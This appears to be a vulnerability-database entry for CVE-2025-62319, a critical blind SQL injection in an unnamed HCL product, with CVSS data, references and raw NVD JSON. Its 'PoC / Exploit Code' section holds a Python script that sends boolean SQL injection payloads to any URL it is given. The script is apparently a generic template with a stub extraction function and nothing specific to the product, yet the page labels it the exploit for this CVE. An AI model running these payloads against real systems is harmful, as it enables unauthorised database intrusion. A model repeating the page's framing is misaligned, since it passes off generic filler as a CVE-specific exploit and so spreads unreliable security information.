CVE-2025-62319

Description

Boolean-Based SQL Injection is a type of blind SQL injection where an attacker manipulates SQL queries by injecting Boolean conditions (TRUE or FALSE) into application input fields. Instead of returning database errors or visible data, the application responds differently depending on whether the injected condition evaluates to true or false. This allows an attacker to inject arbitrary SQL into backend configuration queries executed within the application.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HCL Software (具体版本待官方确认)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-62319 Boolean-Based SQL Injection PoC
# Target: HCL Product
# Author: Security Researcher

def test_vulnerability(url):
    """
    Test for Boolean-Based SQL Injection vulnerability
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Normal request baseline
    normal_payload = {'id': '1'}
    normal_resp = requests.post(url, data=normal_payload, headers=headers, timeout=10)
    
    # True condition payload
    true_payload = {'id': "1' AND 1=1 --"}
    true_resp = requests.post(url, data=true_payload, headers=headers, timeout=10)
    
    # False condition payload
    false_payload = {'id': "1' AND 1=2 --"}
    false_resp = requests.post(url, data=false_payload, headers=headers, timeout=10)
    
    # Check if vulnerability exists
    if true_resp.text == normal_resp.text and false_resp.text != normal_resp.text:
        print('[+] VULNERABLE: Boolean-based SQL injection confirmed!')
        print('[+] True condition matches normal response')
        print('[+] False condition returns different response')
        return True
    else:
        print('[-] NOT VULNERABLE or target not accessible')
        return False

def extract_data(url, sql_payload):
    """
    Extract data using boolean-based blind injection
    Example: Extract database version
    """
    headers = {'User-Agent': 'Mozilla/5.0'}
    result = ""
    
    # Example payload for extracting data
    # Adjust based on actual target
    data = {'id': sql_payload}
    response = requests.post(url, data=data, headers=headers, timeout=10)
    
    return response

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-62319.py <target_url>')
        print('Example: python cve-2025-62319.py http://target.com/endpoint')
        sys.exit(1)
    
    target_url = sys.argv[1]
    print(f'[*] Testing CVE-2025-62319 on {target_url}')
    test_vulnerability(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62319
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62319
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62319/
[4] VulDB https://vuldb.com/cve/CVE-2025-62319
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62319", "sourceIdentifier": "[email protected]", "published": "2026-03-16T16:16:13.167", "lastModified": "2026-03-17T14:20:01.670", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Boolean-Based SQL Injection is a type of blind SQL injection where an attacker manipulates SQL queries by injecting Boolean conditions (TRUE or FALSE) into application input fields. Instead of returning database errors or visible data, the application responds differently depending on whether the injected condition evaluates to true or false. This allows an attacker to inject arbitrary SQL into backend configuration queries executed within the application."}, {"lang": "es", "value": "La Inyección SQL Basada en Booleanos es un tipo de inyección SQL ciega donde un atacante manipula consultas SQL inyectando condiciones booleanas (VERDADERO o FALSO) en campos de entrada de la aplicación. En lugar de devolver errores de la base de datos o datos visibles, la aplicación responde de manera diferente dependiendo de si la condición inyectada se evalúa como verdadera o falsa. Esto permite a un atacante inyectar SQL arbitrario en consultas de configuración de backend ejecutadas dentro de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]"}]}}